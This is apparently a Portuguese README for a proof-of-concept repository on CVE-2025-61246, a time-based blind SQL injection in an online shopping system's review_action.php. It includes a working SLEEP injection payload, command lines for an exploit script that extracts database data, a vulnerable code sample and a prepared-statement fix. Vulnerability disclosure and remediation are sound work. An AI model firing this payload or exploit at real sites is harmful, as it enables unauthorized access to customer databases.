
CVE-2025-61246: Vulnerabilidade de SQL Injection PoC em Online Shopping System PHP
Este repositório contém uma Prova de Conceito (PoC) para CVE-2025-61246, uma vulnerabilidade crítica de Injeção SQL descoberta na aplicação PHP Online Shopping System. A vulnerabilidade permite que um atacante não autenticado execute comandos SQL arbitrários através de injeção SQL cega baseada em tempo.
/online-shopping-system-php-master/review_action.phpproIdA vulnerabilidade existe no endpoint review_action.php, onde a entrada fornecida pelo utilizador no parâmetro proId é incorporada diretamente em consultas SQL sem sanitização adequada ou consultas parametrizadas. Isto permite que um atacante injete payloads SQL maliciosos que podem:
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);
Um atacante pode explorar esta vulnerabilidade:
/online-shopping-system-php-master/review_action.phpproIdproId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
Este repositório inclui:
exploit.py) - Script em Python para detetar e explorar a vulnerabilidadeMANUAL_TESTING.md) - Instruções passo a passo para exploração manualdocker-compose.yml) - Ambiente Docker para testes segurosREMEDIATION.md) - Práticas de codificação segura e correçõesPython 3.7+
pip install -r requirements.txt
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only
# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db
# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit
# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
A exploração bem-sucedida desta vulnerabilidade pode levar a:
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();
Para etapas detalhadas de remediação, consulte REMEDIATION.md.
⚠️ IMPORTANTE: Esta PoC é fornecida apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas informáticos é ilegal. O autor não se responsabiliza pelo uso indevido destas informações. Sempre obtenha autorização adequada antes de testar.
Govind Pratap Singh
Este projeto está licenciado sob a Licença MIT - consulte o ficheiro LICENSE para obter detalhes.
Divulgação Responsável: Se descobrir uma vulnerabilidade de segurança, reporte-a de forma responsável ao fornecedor antes da divulgação pública.